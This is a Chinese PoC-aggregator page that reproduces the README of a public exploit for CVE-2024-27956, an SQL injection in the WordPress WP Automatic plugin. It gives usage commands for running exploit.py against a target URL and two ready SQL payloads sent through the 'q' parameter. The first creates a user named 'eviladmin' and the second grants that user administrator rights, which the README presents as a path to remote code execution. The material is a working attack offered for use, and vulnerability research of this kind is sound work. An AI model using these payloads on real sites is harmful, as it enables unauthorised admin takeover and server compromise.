POC详情: dd5d0008a7f021ac24329096771a39a93d647640

来源
https://github.com/cve-2024/CVE-2024-27956-RCE
关联漏洞
标题: WordPress Plugin WP Automatic SQL注入漏洞 (CVE-2024-27956)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin WP Automatic 存在SQL注入漏洞,该漏洞源于存在 SQL 注入漏洞。
介绍
# CVE-2024-27956-RCE
A PoC for CVE-2024-27956, a SQL Injection in ValvePress Automatic plugin. This PoC exploit the vulnerability creating a user in the target and giving Administrator rights. Being an administrator in wordpress can lead to Remote Code Execution.

<h1>Usage</h1>

```
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
```

<h1>Payloads</h1>
SQL Injection payload to create a user:

```
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
```

Giving admin rights:

```
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
```

In the q parameter, we can pass our entire query and then it will be executed.

![image](https://github.com/diego-tella/CVE-2024-27956-RCE/assets/70545257/0e24c3ee-52e0-4e7f-9eb1-b54e4096325f)
The user input is executed directly without any kind of restriction or sanitization.

<h1>PoC</h1>
<a href="https://www.youtube.com/watch?v=2y5siI-K-G0"><img src="Screenshot_2.png"></a>
文件快照

 [4.0K]  /data/pocs/dd5d0008a7f021ac24329096771a39a93d647640
├── [2.2K]  exploit.py
├── [1.3K]  README.md
└── [185K]  Screenshot_2.png

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。